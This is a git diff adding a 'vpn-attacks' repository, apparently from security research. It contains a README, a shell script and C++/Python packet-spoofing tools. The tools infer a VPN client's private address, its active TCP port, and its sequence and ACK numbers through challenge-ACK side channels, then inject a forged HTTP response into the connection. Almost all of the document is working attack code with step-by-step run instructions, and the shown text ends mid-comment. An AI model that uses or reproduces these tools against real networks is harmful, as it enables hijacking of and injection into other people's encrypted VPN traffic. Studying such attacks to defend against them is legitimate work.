diff --git a/README.md b/README.md index 490f082..ccba42b 100644 --- a/README.md +++ b/README.md @@ -1,2 +1,80 @@ # vpn-attacks + +##### Attack Machine Environment + +* C++ +* libtins (http://libtins.github.io/download/) + + +## Server-side attack + + +#### Requirements + +* VPN client connected to a VPN server +* Attack machine sitting somewhere in between VPN server and client forwarding all traffic between the two + +***Note:*** Full virtual test environment setup for the server-side attack is detailed in the README within the `virt-lab` folder + + +#### Running the DNS Attack Script + +1. Change to udp-dns attack folder - `cd other-end-attack/dnuss/full_scan` +2. Compile attack script - `make` +3. Check to make sure vpn server has a conntrack entry for some vpn client's dns lookup (on vpn-server vm): `sudo conntrack -L | grep udp` +3. Try to inject from attack router - `sudo ./uud_send ` + + + +## Client-side attack + + +#### Requirements + +* VPN client connected to a VPN server +* Reverse path filtering disabled on the VPN client machine +* Attack router acting as the local network gateway for the victim (VPN client) machine + + +#### Running the Full Attack Script + +* Rebuild all the attack scripts: `./rebuild_all.sh` +* `cd full_attack` +* Change `attack.sh` vars to appropriate values +* `sh attack.sh ` + +***Note:*** `remote_ip` specifies the IP address of the HTTP site. + + +#### Testing Indivual attack phases + + +##### Phase 1 - Infer victim's private address + +* `cd first_phase` +* `python3 send.py ` + +***Note:*** `private_ip_range` specifies a `/24` network such as `10.7.7.0`. + + +##### Phase 2 - Infer the port being used to talk to some remote address + +* `cd sec_phase` +* Edit `send.cpp` to use the correct MAC addresses +* `g++ send.cpp -o send -ltins` +* `./send ` + +***Note:*** `` is the address we wanna check if the client is connected to and the `` is almost always 80 or 443. The `` is the public address of the victim and `` was found in phase 1. If the scripts not sniffing any challenge acks, then edit the `send.cpp` file to uncomment the `cout` line that prints out the remainder to check if the size of the encrypted packets has slightly changed on this system. + + +##### Phase 3 - Infer exact sequence number and in-window ack + +* `cd third_phase` +* Edit `send.cpp` to use the correct MAC addresses +* `g++ send.cpp -o send -ltins` +* `./send ` + + +***Note:*** `` was found in phase 2. This script currently just injects a hardcoded string into the TCP connnection but could be easily modified. + diff --git a/client-side-attack/complete_attack/attack.sh b/client-side-attack/complete_attack/attack.sh new file mode 100755 index 0000000..a452ec8 --- /dev/null +++ b/client-side-attack/complete_attack/attack.sh @@ -0,0 +1,37 @@ +REMOTE_ADDR=$1 +REMOTE_PORT=80 + +VICTIM_WLAN_ADDR=192.168.12.58 # vpn client public ip +WLAN_GATEWAY=192.168.12.1 # address of local network gateway +VICTIM_PRIV_NET=10.7.2.0 # nord uses 10.7.2.x typically +PRIV_NETMASK=255.255.255.0 + +REQUEST_SIZE=529 +DEST_MAC=a4:34:d9:53:92:c4 +INTERFACE=wlp1s0 + +echo "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~~~~~~~~~ PHASE 1 ~~~~~~~~~~~\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" + +echo `date` +echo "attempting to infer client's private VPN address.." + +cd ../first_phase + + +PRIV_IP="$(./send_p1 $DEST_MAC $VICTIM_PRIV_NET $PRIV_NETMASK $WLAN_GATEWAY $INTERFACE)" +echo "phase 1 client private IP: ${PRIV_IP}" + +echo "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~~~~~~~~~ PHASE 2 ~~~~~~~~~~~\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" +echo `date` +echo "determining if client is talking to ${REMOTE_ADDR} on any port.." +cd ../sec_phase +VPORT="$(./send_p2 $REMOTE_ADDR $REMOTE_PORT $VICTIM_WLAN_ADDR $PRIV_IP $DEST_MAC)" +echo "phase 2 port result: ${VPORT}" + +echo "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~~~~~~~~~ PHASE 3 ~~~~~~~~~~~\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" +echo `date` +echo "beginning phase 3 to infer sequence and ack numbers needed to inject.." +cd ../third_phase +./send_p3 $REMOTE_ADDR $REMOTE_PORT $VICTIM_WLAN_ADDR $PRIV_IP $DEST_MAC $VPORT $REQUEST_SIZE + +echo `date` diff --git a/client-side-attack/first_phase/Makefile b/client-side-attack/first_phase/Makefile new file mode 100644 index 0000000..5c6768e --- /dev/null +++ b/client-side-attack/first_phase/Makefile @@ -0,0 +1,2 @@ +all: + g++ -O3 -o send_p1 send.cpp -lpthread -ltins -std=c++11 diff --git a/client-side-attack/first_phase/phase_one_attack.sh b/client-side-attack/first_phase/phase_one_attack.sh new file mode 100755 index 0000000..42b3267 --- /dev/null +++ b/client-side-attack/first_phase/phase_one_attack.sh @@ -0,0 +1,10 @@ +#/bin/bash + +./phase_one_attack 52:54:00:12:ae:4c\ + 52:54:00:12:ae:3f\ + 10.7.1.0\ + 255.255.255.0\ + 192.168.64.1\ + ens5\ + 35220\ + 443 diff --git a/client-side-attack/first_phase/send.cpp b/client-side-attack/first_phase/send.cpp new file mode 100644 index 0000000..f4e21ab --- /dev/null +++ b/client-side-attack/first_phase/send.cpp @@ -0,0 +1,204 @@ +/* + * Modified from http://libtins.github.io/examples/syn-scanner/ + * + * INCLUDED COPYRIGHT + * Copyright (c) 2016, Matias Fontanini + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are + * met: + * + * * Redistributions of source code must retain the above copyright + * notice, this list of conditions and the following disclaimer. + * * Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following disclaimer + * in the documentation and/or other materials provided with the + * distribution. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS + * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT + * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR + * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT + * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, + * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT + * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, + * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY + * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT + * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + * + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +using std::cout; +using std::endl; +using std::vector; +using std::pair; +using std::setw; +using std::string; +using std::set; +using std::runtime_error; + +using namespace Tins; + +typedef pair sniffer_data; + +std::string vip; +std::string gwip; + +bool verbose = false; + + +class Scanner { +public: + Scanner(NetworkInterface& interface, + std::string dest_mac, + std::string source_mac, + std::string gateway_ip, + std::string private_ip, + std::string private_ip_subnet_mask, + int sport, + int dport); + + void run(); +private: + void send_synacks(); + bool callback(PDU& pdu); + static void* thread_proc(void* param); + void launch_sniffer(); + NetworkInterface iface; + std::string dst_mac; + std::string src_mac; + std::string src_ip; + std::string victim_ip; + std::string victim_subnet; + int sport; + int dport; + Sniffer sniffer; +}; + +Scanner::Scanner(NetworkInterface& interface, + std::string dest_mac, + std::string source_mac, + std::string gateway_ip, + std::string private_ip, + std::string private_ip_subnet_mask, + int src_port, + int dst_port) : iface(interface), dst_mac(dest_mac), src_mac(source_mac), src_ip(gateway_ip), victim_ip(private_ip), victim_subnet(private_ip_subnet_mask), sport(src_port), dport(dst_port),sniffer(interface.name()) { + +} + +void* Scanner::thread_proc(void* param) { + Scanner* data = (Scanner*)param; + data->launch_sniffer(); + return 0; +} + +void Scanner::launch_sniffer() { + sniffer.sniff_loop(make_sniffer_handler(this, &Scanner::callback)); +} + +/* Our scan handler. This will receive SYN-ACKS and inform us + * the scanned port's status. + */ +bool Scanner::callback(PDU& pdu) { + // Find the layers we want. + const IP &ip = pdu.rfind_pdu(); // Grab IP layer of sniffed packet + const TCP &tcp = pdu.rfind_pdu(); // Grab TCP layer + static int total_seen = 0; + if (ip.src_addr().to_string().rfind("10.", 0) == 0 && tcp.sport() != 22) { + if (verbose) std::cout << "Victim IP is:"; + std::cout << ip.src_addr() << "\n"; + vip = ip.src_addr(); + total_seen += 1; + if (total_seen > 0) { + return false; + + } + } + return true; +} + +void Scanner::run() { + pthread_t thread; + // Launch our sniff thread. + pthread_create(&thread, 0, &Scanner::thread_proc, this); + // Start sending SYNs to port. + send_synacks(); + + // Wait for our sniffer. + void* dummy; + pthread_join(thread, &dummy); +} + +// Send syn acks to the given ip address, using the destination ports provided. +void Scanner::send_synacks() { + // Retrieve the addresses. + PacketSender sender; + IPv4Range ip_range = IPv4Range::from_mask(victim_ip, victim_subnet); + + + for (const IPv4Address &addr : ip_range) { + EthernetII pkt = EthernetII(dst_mac, src_mac) / IP(addr, src_ip) / TCP(dport, sport); + TCP& tcp = pkt.rfind_pdu(); + tcp.set_flag(TCP::ACK, 1); + tcp.set_flag(TCP::SYN, 1); + if (verbose) std::cout << "Sending to IP:" << addr << std::endl; + sender.send(pkt, iface); + sender.send(pkt, iface); + usleep(10); + } + +} + +void scan(int argc, char* argv[]) { + std::string dst_mac = argv[1]; // victim MAC address + std::string src_mac = ""; // src mac does not matter + std::string private_ip_subnet = argv[2]; + std::string private_ip_subnet_mask = argv[3]; + gwip = argv[4]; // IP of server that client is talking to + + int sport = 80; // source, dest port for phase-1 are arbitrary + int dport = 80; + + + IPv4Address ip(gwip); + // Resolve the interface which will be our gateway + NetworkInterface iface(ip); + if (verbose) cout << "Sniffing on interface: " << iface.name() << endl; + // Consume arguments + Scanner scanner(iface, dst_mac, src_mac, gwip, private_ip_subnet, + private_ip_subnet_mask, sport, dport); + scanner.run(); +} + +int main(int argc, char* argv[]) { + if (argc != 6) { + std::cout << "usage: ./send \n"; + exit(-1); + } + try { + scan(argc, argv); + } + catch(runtime_error& ex) { + cout << "Error - " << ex.what() << endl; + } +} diff --git a/client-side-attack/first_phase/slow_p1.py b/client-side-attack/first_phase/slow_p1.py new file mode 100755 index 0000000..d610e0a --- /dev/null +++ b/client-side-attack/first_phase/slow_p1.py @@ -0,0 +1,155 @@ +#!/usr/bin/env python3 +from scapy.all import * +import ipaddress +from threading import Thread, Event +from time import sleep +import os + +# +# +# +# +# Thread classes for sniffing +# +# Sniffer Class all grabbed from https://www.cybrary.it/0p3n/sniffing-inside-thread-scapy-python/ + +class Sniffer(Thread): + def __init__(self, iface="en0"): + + super().__init__() + + self.daemon = True + self.vpn_addr = None + + self.current_phase = 1 + self.spoof_count = 0 + self.spoof_port = 0 + + self.socket = None + self.iface = iface + self.stop_sniffer = Event() + + def run(self): + self.socket = conf.L2listen( + type=ETH_P_ALL, + iface=self.iface, + filter="ip" + ) + + sniff( + opened_socket=self.socket, + prn=self.handle_packet, + + ) + + def join(self, timeout=None): + self.stop_sniffer.set() + super().join(timeout) + + def get_vpn_addr(self): + return self.vpn_addr + + def set_phase(self, phase): + self.current_phase = phase + + + + def check_for_req(self, packet): + + ip_layer = packet.getlayer(IP) + + # for phase 1 (on ubuntu 19) we wanna look for a reset + # with source of private vpn address and dest of gateway + + if self.current_phase == 1: + + if "10." in ip_layer.src: + + if ip_layer.src == self.vpn_addr: + print("multiple matches for: " + str(self.vpn_addr)) + # could make the scan stop after this point but + # only takes a second or two to finish up + + print("Victim private ip is: " + str(ip_layer.src)) + self.vpn_addr = ip_layer.src + + + + + def handle_packet(self, packet): + + #ip_layer = packet.getlayer(IP) + #print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst)) + + # if its not an SSH packet then check for challenge acks + # + if TCP in packet: + tcp_sport = packet[TCP].sport + tcp_dport = packet[TCP].dport + + if (tcp_sport != 2222 and tcp_dport != 2222) or (tcp_sport != 22 and tcp_dport != 22): + + self.check_for_req(packet) +############ + +def phase_one_spread(gateway_ip, dst_net, iface="en0", edst="08:00:27:5c:c9:d1", + sport=50505, dport=443, flags="SA"): + + pieces = gateway_ip.split('.') + src = pieces[0] + '.' + pieces[1] + '.' + pieces[2] + '.1'# should be gateway of LAN + src = gateway_ip + eth = Ether(dst=edst) + tcps = TCP(sport=sport,dport=dport,flags=flags) # src and dst ports don't matter + + for ip in ipaddress.IPv4Network(dst_net + '/24'): + print('{} to: {}'.format(flags, str(ip))) + ip_pack = IP(src = src, dst = str(ip)) + sendp(eth/ip_pack/tcps, iface=iface, count=2, verbose=0) + + + print("\nFinished spreading to private address space.") + + +def main(): + if len(sys.argv) < 5: + print("Usage:\n{} {} {} {} {} [{}] [{}]".format( + sys.argv[0], "", "", "", "", + "", "<>")) + exit(-1) + gateway_ip = sys.argv[1] + vpn_net = sys.argv[2] + iface = sys.argv[3] + edst = sys.argv[4] + if len(sys.argv) == 6: + sport = int(sys.argv[5]) + else: + sport = 50505 + if len(sys.argv) == 7: + dport = int(sys.argv[6]) + else: + dport = 443 + if len(sys.argv) == 8: + flags = sys.argv[7] + else: + flags = "SA" + + + sniffer = Sniffer(iface=iface) + sniffer.start() + + ## Phase 1 - spread private address range passed in + # + sleep(.5) + + print("Scanning entire dest net " + str(vpn_net)) + phase_one_spread(gateway_ip, str(vpn_net), + iface=iface, edst=edst, + sport=sport, dport=dport, flags=flags) + + vpn_addr = sniffer.get_vpn_addr() + print('Completed phase one and found client has private VPN address: ' + str(vpn_addr) + '\n\n') + + + +if __name__ == '__main__': + main() diff --git a/client-side-attack/rebuild_all.sh b/client-side-attack/rebuild_all.sh new file mode 100755 index 0000000..0118f0e --- /dev/null +++ b/client-side-attack/rebuild_all.sh @@ -0,0 +1,12 @@ +echo "Remaking each attack phase script..." + +cd ./first_phase +make + +cd ../sec_phase +make + +cd ../third_phase +make + +echo "Finished building attack scripts." diff --git a/client-side-attack/sec_phase/Makefile b/client-side-attack/sec_phase/Makefile new file mode 100644 index 0000000..5060342 --- /dev/null +++ b/client-side-attack/sec_phase/Makefile @@ -0,0 +1,2 @@ +all: + g++ -O3 -o send_p2 send.cpp -lpthread -ltins -std=c++11 diff --git a/client-side-attack/sec_phase/send.cpp b/client-side-attack/sec_phase/send.cpp new file mode 100644 index 0000000..00749d0 --- /dev/null +++ b/client-side-attack/sec_phase/send.cpp @@ -0,0 +1,241 @@ +#include +#include +#include +#include +#include +#include + + +using std::thread; +using std::cout; +using std::string; +using namespace Tins; + + +int current_spoof_port, best_port, chack_count; +bool sniffed_chack = false; +bool is_running = true; +bool verbose = false; +bool count_chacks = false; +bool quick_mode = true; // if true we don't recheck the port + +int num_sent = 0; +string victim_wlan_addr; +string remote_addr; + + + +void print_divider(int count) { + int i = 0; + while (i < count) { + if (verbose) cout << "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; + i++; + } +} + +bool handle_packet(PDU &some_pdu) { + + const IP &ip = some_pdu.rfind_pdu(); // Grab IP layer of sniffed packet + // keep track of the last port we spoofed + if (ip.src_addr() == remote_addr) current_spoof_port = some_pdu.rfind_pdu().dport(); + + if (ip.src_addr() == victim_wlan_addr) { // the packet is a response from the client + + const uint32_t& payload = some_pdu.rfind_pdu().payload_size(); + //cout << "sniffed something: " <(); + tcp.set_flag(TCP::SYN, 1); + + int count = 0; + usleep(1000000 / 2); + + while (count < num_checks) { + sender.send(pkt, iface); + usleep(1000000 / 2); // must sleep half second due to chack rate limit + count ++; + } + + usleep(1000000); + + // should have just sniffed as many chacks as we just sent + if (verbose) cout << "end of rechack, count : " << chack_count << ", should be: " << num_checks << " \n"; + + if (chack_count >= num_checks) { + return true; + } + + count_chacks = false; + num_sent += count; + + return false; + +} + + + +// Spreads SYNs across the victim's entire port range +// coming from a specific remote_ip:port +// +int phase_two_spread(string dest_mac, string src_mac, string source_ip, int sport, string victim_ip) { + + PacketSender sender; + NetworkInterface iface("wlp1s0"); + + int start_port = 39000;//32768; // typical Linux ephemeral port range - (32768, 61000) + int end_port = 42000;//61000; + int i; + + EthernetII pkt = EthernetII(dest_mac, src_mac) / IP(victim_ip, source_ip) / TCP(40404, sport); + TCP& tcp = pkt.rfind_pdu(); + tcp.set_flag(TCP::SYN, 1); + + int current_port = best_port; + + for (i = start_port; i < end_port; i ++) { + + tcp.dport(i); // set the packets dest port to current guess + sender.send(pkt, iface); + num_sent ++; + usleep(10); + + } + + usleep(1000000); // sleep to give victim time to respond w chack + + current_port = best_port; + if (verbose) cout << "finished round 1 w guessed port: " << current_port << "\n"; + + // In round 1 we spoofed fast (10 sleep) to get a good estimate of the + // port in use. Round 2, we spoof slower from about 50 packets back to account + // for the delay in response and hopefully get the exact port number in use + + print_divider(1); + usleep(1000000 / 2); + sniffed_chack = false; + + int j; + int send_delay = 300; + + if (verbose) cout << "Starting round 2 spread from: " << (current_port - send_delay) << " to " << current_port << "\n"; + for (j = (current_port - send_delay); j < current_port; j++) { + tcp.dport(j); // set the packets dest port to current guess + sender.send(pkt, iface); + num_sent ++; + usleep(600 * 5); + } + + usleep(1000000); + + if (verbose) cout << "finished round 2 w guessed port: " << best_port << "\n"; + + return best_port; + +} + + + +int find_port(string dest_mac, string src_mac, string source_ip, int sport, string victim_ip) { + + bool is_found = false; + int current_port = 0; + + while (!is_found) { + + current_port = phase_two_spread(dest_mac, src_mac, remote_addr, sport, victim_ip); + print_divider(1); + + if (verbose) cout << "finished phase 2 w possible port: " << current_port << "\n"; + + cout << current_port << "\n"; + + if (quick_mode) { + is_found = true; + } else { + is_found = rechack(2, current_port, dest_mac, src_mac, remote_addr, sport, victim_ip); + } + + } + + return current_port; + +} + + + + +int main(int argc, char** argv) { + + if (argc != 5 && argc != 6) { + cout << "sike wrong number of args ---> (remote_addr, sport, victim_pub_ip, victim_priv_ip, victim_mac_addr)\n"; + return 0; + } + + remote_addr = argv[1]; + int sport = atoi(argv[2]); + victim_wlan_addr = argv[3]; + string dest_ip = argv[4]; + //verbose = true; + + string dest_mac = argv[5]; + string src_mac = ""; + + print_divider(2); + + thread sniff_thread(sniff_stuff); + + int p = find_port(dest_mac, src_mac, remote_addr, sport, dest_ip); + is_running = false; + sniff_thread.detach(); + //sniff_thread.join(); + + print_divider(1); + if (verbose) cout << "Completed phase 2 with port: " << p << "\n\n"; + cout << p << "\n"; + + return p; +} diff --git a/client-side-attack/third_phase/Makefile b/client-side-attack/third_phase/Makefile new file mode 100644 index 0000000..f21db28 --- /dev/null +++ b/client-side-attack/third_phase/Makefile @@ -0,0 +1,2 @@ +all: + g++ -O3 -o send_p3 send.cpp -lpthread -ltins -std=c++11 diff --git a/client-side-attack/third_phase/send.cpp b/client-side-attack/third_phase/send.cpp new file mode 100644 index 0000000..f75bbf1 --- /dev/null +++ b/client-side-attack/third_phase/send.cpp @@ -0,0 +1,694 @@ +#include +#include +#include +#include +#include +#include + + +using std::thread; +using std::cout; +using std::vector; +using namespace Tins; + +long current_spoof_seq; +long current_spoof_ack; +long current_min_ack; +long best_seq = 0; +long best_ack; + +vector possible_seqs; +vector possible_acks; + +int num_sent = 0; +int current_round = 1; +bool ack_search = false; +bool track_nums = false; +bool count_chacks = false; +bool sniffed_chack = false; + +bool show = false; +bool testing = true; // if using netcat set to true, else false +int sniff_request = 0; // 0 = off, 1 = sniffing for request, 2 = sniffed that request + +std::string victim_wlan_addr, dest_ip, remote_addr; +int sport, dport, request_size, chack_count; + + +std::string dest_mac; // victim mac addr +std::string src_mac = ""; // src mac doesn't matter + + +void print_divider(int count) { + int i = 0; + while (i < count) { + cout << "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; + i++; + } +} + +int inject_junk(long exact_seq, long in_win_ack) { + + PacketSender sender; + NetworkInterface iface("wlp1s0"); + + std::string message = "HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\nContent-Length: 84\r\nConnection: keep-alive\r\n\r\n

Just some junk here..

"; + + EthernetII pkt = EthernetII(dest_mac, src_mac) / IP(dest_ip, remote_addr) / TCP(dport, sport) / RawPDU(message);; + TCP& tcp = pkt.rfind_pdu(); + + tcp.set_flag(TCP::PSH, 1); + tcp.set_flag(TCP::ACK, 1); + tcp.seq(exact_seq); + tcp.ack_seq(in_win_ack); + + print_divider(2); + cout << "attempting to inject garbage into the connection..\n"; + cout << "injected seq: " << exact_seq << ", in-win ack: " << in_win_ack << "\n"; + + sender.send(pkt, iface); + num_sent ++; + + return 1; + +} + + +// Send the same probe a number of times +// to see if the same amount of responses are +// triggered from the client +// +bool rechack(long seq, long ack, int num_checks) { + + PacketSender sender; + NetworkInterface iface("wlp1s0"); + count_chacks = true; + + EthernetII pkt = EthernetII(dest_mac, src_mac) / IP(dest_ip, remote_addr) / TCP(dport, sport) / RawPDU("");; + TCP& tcp = pkt.rfind_pdu(); + + if (ack == 0) { + tcp.set_flag(TCP::RST, 1); + } else { + tcp.set_flag(TCP::PSH, 1); + tcp.set_flag(TCP::ACK, 1); + tcp.ack_seq(ack); + } + + + tcp.seq(seq); + chack_count = 0; + int count = 0; + usleep(1000000 / 2); + + while (count < num_checks) { + sender.send(pkt, iface); + num_sent ++; + usleep(1000000 / 2 * 1.2); // must sleep half second due to chack rate limit + count ++; + } + + usleep(1000000); + + // should have just sniffed as many chacks as we just sent + cout << "end of rechack, count was: " << chack_count << ", should be: " << num_checks << " \n"; + + if (chack_count >= num_checks) { + return true; + } + + count_chacks = false; + + return false; + +} + + +// Use the fact the client will respond to empty PSH-ACKs +// that have an in window ack AND a sequence number less than the exact +// next expected sequence, with chall-acks to infer exact sequence num +// +long find_exact_seq(long in_win_seq, long in_win_ack, int send_delay) { + + PacketSender sender; + NetworkInterface iface("wlp1s0"); + + EthernetII pkt = EthernetII(dest_mac, src_mac) / IP(dest_ip, remote_addr) / TCP(dport, sport) / RawPDU("");; + TCP& tcp = pkt.rfind_pdu(); + + tcp.set_flag(TCP::PSH, 1); + tcp.set_flag(TCP::ACK, 1); + tcp.ack_seq(in_win_ack); + + count_chacks = false; + track_nums = false; + + long min_seq = in_win_seq - 200; // assuming the in_window_seq is within 200 of the left edge of window + sniffed_chack = false; + long curr_seq = in_win_seq; + + // Continually decrement the in window sequence number + // until we sniff a chack which means we just passed the + // left edge of the sequence window + // + print_divider(1); + bool is_found = false; + + while (!is_found) { + + long j = curr_seq; + sniffed_chack = false; + + while (j > min_seq && !sniffed_chack) { + usleep(send_delay); + cout << "spoofing with seq: " << j << "\n"; + + tcp.seq(j); + sender.send(pkt, iface); + num_sent ++; + j -= 1; + } + + usleep(100000); + curr_seq = best_seq; + cout << "best seq at end of exact scan: " << curr_seq << "\n"; + + print_divider(1); + is_found = rechack(curr_seq, in_win_ack, 2); + if (show) cout << "exact seq was in win after rechack? " << is_found << "\n"; + + } + + return curr_seq; +} + + +// Use the fact the client will respond to empty PSH-ACKs +// that have an in window sequence number AND ack number less than the +// ack number in use with chall-acks to infer an in-window ack number +// +long find_ack_block(long max_ack, long min_ack, long in_win_seq, long block_size, int send_delay, bool verbose, int chack_trigs) { + + PacketSender sender; + NetworkInterface iface("wlp1s0"); + + // Loop over ack space sending empty push-acks + // that user the in window sequence number found before + // + + EthernetII pkt = EthernetII(dest_mac, src_mac) / IP(dest_ip, remote_addr) / TCP(dport, sport) / RawPDU("");; + TCP& tcp = pkt.rfind_pdu(); + tcp.set_flag(TCP::PSH, 1); + tcp.set_flag(TCP::ACK, 1); + tcp.seq(in_win_seq); + + sniffed_chack = false; + chack_count = 0; + count_chacks = true; + track_nums = true; + + current_min_ack = min_ack; + long j = max_ack; + long current_ack = 0; + best_ack = 0; + + + while (j > min_ack && chack_count < chack_trigs) { // was && !sniffed_chack + usleep(send_delay); + + tcp.ack_seq(j); + sender.send(pkt, iface); + num_sent ++; + + if (verbose && show) cout << "spoofing with ack: " << j << "\n"; + + if (j < 100000000) { // for tiny ack range + j -= block_size / 100; + + } else { + j -= block_size; + } + } + + usleep(100000); + + + for (int i = 0; i < possible_acks.size(); i ++) { + long cack = possible_acks[i]; + if (cack > current_ack) current_ack = cack; + + } + cout << "best ack at end of ack scan: " << current_ack << "\n"; + track_nums = false; + + return current_ack; +} + +// Finds the "quiet" portion of the ack range to +// start scanning and then begins to find an approx +// ack block close to the one being used +// +long quack_spread(long in_win_seq) { + + cout << "starting quack spread w seq: " << in_win_seq << "\n"; + + long start_ack_guess = 4294967294 / 2; + long end_ack_guess = 100; + + long block_size = 100000000; + sniffed_chack = false; // assume its gonna find an ack here first + + + // if the actual ack is less than half of the max_ack allowed, + // then it will consider acks at the very top end of the ack space (~429.....) + // to be less than that small ack. therefore, we check if the max ack + // triggers chacks right away, if so then we half the start_ack guess (~214....) + + + bool triggering = rechack(in_win_seq, start_ack_guess, 3); + + cout << "is ack in upper half? " << triggering << "\n"; + + if (triggering) { // then we know the ack is in the lower half of the ack space + start_ack_guess = start_ack_guess * 2; + } + + long j = start_ack_guess; + sniffed_chack = false; + print_divider(1); + + // Now continually decrement ack until we trigger another chack + // + + int send_delay = 75000; + bool is_found = false; + long current_ack = 0; + + while (!is_found) { + + current_ack = find_ack_block(start_ack_guess, 0, in_win_seq, block_size, send_delay, true, 1); + + cout << "finished quiet block spread, guessed quiet block ack: " << current_ack << "\n"; + print_divider(1); + + // recheck and send multiple to make sure we found correct ack block + is_found = rechack(in_win_seq, current_ack, 2); + if (show) cout << "was in win after rechack? " << is_found << "\n"; + + if (!is_found) start_ack_guess = current_ack; + } + + + return current_ack; +} + +// Use the fact the client will respond to RSTs +// with an in-window sequence number with chall-acks to +// infer an in-window seq number +// +long find_seq_block(long prev_block_size, long new_block_size, long delay_mult, long send_delay, long top_seq) { + + PacketSender sender; + NetworkInterface iface("wlp1s0"); + + long max_seq = top_seq; + long adder = prev_block_size * delay_mult; + + cout << "starting round " << current_round << " spread at: " << (max_seq - adder) << "\n"; + + EthernetII pkt = EthernetII(dest_mac, src_mac) / IP(dest_ip, remote_addr) / TCP(dport, sport); + TCP& tcp = pkt.rfind_pdu(); + tcp.set_flag(TCP::RST, 1); + + long i; + + for (i = (max_seq - adder); i < max_seq; i += new_block_size) { + tcp.seq(i); + sender.send(pkt, iface); + num_sent ++; + usleep(send_delay); + } + + cout << "finished round " << current_round << " spread, guessed in window seq: " << best_seq << "\n"; + + return best_seq; + +} + + +// Attempt to sniff challenge acks while recording +// the last sequence or ack number we spoofed +// +bool handle_packet(PDU &some_pdu) { + + const IP &ip = some_pdu.rfind_pdu(); + + if (ack_search) { + // keep track of the last ack num we spoofed + if (ip.src_addr() == remote_addr) current_spoof_ack = some_pdu.rfind_pdu().ack_seq(); + + if (ip.src_addr() == victim_wlan_addr) { + + const uint32_t& payload = some_pdu.rfind_pdu().payload_size(); + //cout << payload << "\n"; + + if (payload == 79) { // each triggered chall-ack is 79 length SSL vs ovpn and ubuntu 19 + if (show) cout << "sniffed chack w ack: " << (current_spoof_ack) << "\n"; + if (count_chacks) chack_count += 1; + if (track_nums) possible_acks.push_back(current_spoof_ack); + if (current_spoof_ack > current_min_ack) best_ack = current_spoof_ack; + sniffed_chack = true; + } + } + + } else if (sniff_request == 1) { + // sniffing for a certain client request size (last step after finding seq and ack) + if (ip.src_addr() == victim_wlan_addr) { + const uint32_t& payload = some_pdu.rfind_pdu().payload_size(); + cout << "sniffed cli request of size " << payload << "\n"; + if (payload == request_size) { + sniff_request = 2; + } + } + + } else { // sniffing for chack during sequence search + + // keep track of the last sequence num we spoofed + if (ip.src_addr() == remote_addr) current_spoof_seq = some_pdu.rfind_pdu().seq(); + + if (ip.src_addr() == victim_wlan_addr) { + + const uint32_t& payload = some_pdu.rfind_pdu().payload_size(); + //cout << payload << "\n"; + const int remainder = payload % 67; + + if (payload == 79) { + + if (show) cout << "sniffed chack w seq: " << (current_spoof_seq) << "\n"; + + if (track_nums) { + best_seq = current_spoof_seq; + possible_seqs.push_back(current_spoof_seq); + } else if (count_chacks) { // + chack_count += 1; + best_seq = current_spoof_seq; + } else { + if (!sniffed_chack) { + + if (best_seq == 0) { // still in initial seq spread + best_seq = current_spoof_seq; + sniffed_chack = true; + } else { + // make sure new seq is less than the previous sniffed one + if (current_spoof_seq < best_seq) { + best_seq = current_spoof_seq; + sniffed_chack = true; + } + } + + } + } + + } + + } + } + + return true; +} + +void sniff_stuff() { + SnifferConfiguration config; + config.set_promisc_mode(true); + Sniffer sniffer("wlp1s0", config); + sniffer.sniff_loop(handle_packet); // call the handle function for each sniffed pack +} + + +// Try to find an in window sequence number using +// one of the very rough estimates found in the first +// sequence spread +long try_seq_block(long current_seq) { + + // Just did round 1 spoofing fast to get rough estimate of + // in window sequence number, now we send a round 2 and 3 spreads + // using the approximated seq with lower send rates + + current_round = 2; + sniffed_chack = false; + int wait_count = 0; + best_seq = current_seq; + usleep(1000000 / 2); + + // this will take into account the last block size of 50k, + // skip in blocks of 1055 seq nums per send, assume the last + // rounds delay was 80 packets for a response, and send every 150 msecs + long s1 = find_seq_block(50000, 1055, 80, 150, current_seq); + + while (best_seq == current_seq) { + usleep(500000); + if (show) cout << "waiting on round 2 chack..\n"; // return -1 if waiting too long + wait_count +=1; + if (wait_count > 5) return -1; + } + + // Now we should have a close estimate to an in-window seq + // so next do a third scan at much slower rate to ensure its + // an in-window sequence num + print_divider(1); + usleep(1000000 / 2); + + sniffed_chack = false; + current_round += 1; + current_seq = best_seq; + wait_count = 0; + + long s2 = find_seq_block(1055, 20, 50, 600, current_seq); // for browser went from 300 to 600 + + while (best_seq == current_seq) { + usleep(500000); + if (show) cout << "waiting on round 3 chack..\n"; + wait_count +=1; + if (wait_count > 5) return -1; + } + + return best_seq - 10000; // subtract 10k for wifi delay + +} + +// Gets rough estimate of sequence number in 